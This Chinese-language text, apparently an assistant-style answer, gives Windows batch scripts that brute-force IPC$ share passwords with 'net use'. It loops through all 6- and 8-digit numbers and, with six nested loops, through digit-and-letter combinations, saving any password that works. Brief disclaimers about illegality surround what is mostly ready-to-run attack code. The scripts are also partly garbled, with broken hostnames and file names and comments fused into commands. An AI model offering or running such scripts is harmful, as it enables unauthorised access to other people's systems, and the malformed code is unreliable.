IPC$漏洞多位密码爆破方法
虽然不应该将其用于非法的密码破解行为,但从代码修改角度来说,如果要破解多位密码(比如 n 位),你可以按照以下方式调整:
破解多位纯数字密码
如果你想破解 6 位纯数字密码:
FOR /L %%i IN (100000,1,999999) DO (net use \\target - ip\ipc$ /user:weak %%i && (echo %%i>ipc - pwd.txt)
)如果你想破解例如 8 位纯数字密码:
FOR /L %%i IN (10000000,1,99999999) DO (net use \\target - ip\ipc$ /user:weak %%i && (echo %%i>ipc - pwd.txt)
)破解包含字母的多位密码(更复杂的情况)
如果密码包含字母,那么情况会复杂很多。一种简单粗暴的方式是通过多层循环来生成所有可能的字符组合。例如,假设密码是由小写字母和数字组成的 6 位密码,那么可以这样(以下只是一个简单的示例,实际情况会因为字符集的大小和密码长度而变得非常复杂):
@echo off
setlocal enabledelayedexpansionrem 定义字符集,这里是数字 0 - 9 和小写字母 a - z
set characters=0123456789abcdefghijklmnopqrstuvwxyzrem 6 位密码,所以有 6 层循环
for /L %%a in (0,1,35) do (for /L %%b in (0,1,35) do (for /L %%c in (0,1,35) do (for /L %%d in (0,1,35) do (for /L %%e in (0,1,35) do (for /L %%f in (0,1,35) do (set password=!characters:~%%a,1!!characters:~%%b,1!!characters:~%%c,1!!characters:~%%d,1!!characters:~%%e,1!!characters:~%%f,1!net use \\target - ip\ipc$ /user:weak!password! && (echo!password!>ipc - pwd.txt))))))
)这种方法的计算量会随着密码长度和字符集的大小呈指数增长,并且如前面所强调的,在没有合法授权的情况下,在任何网络环境中使用类似代码去尝试破解密码都是违法的行为。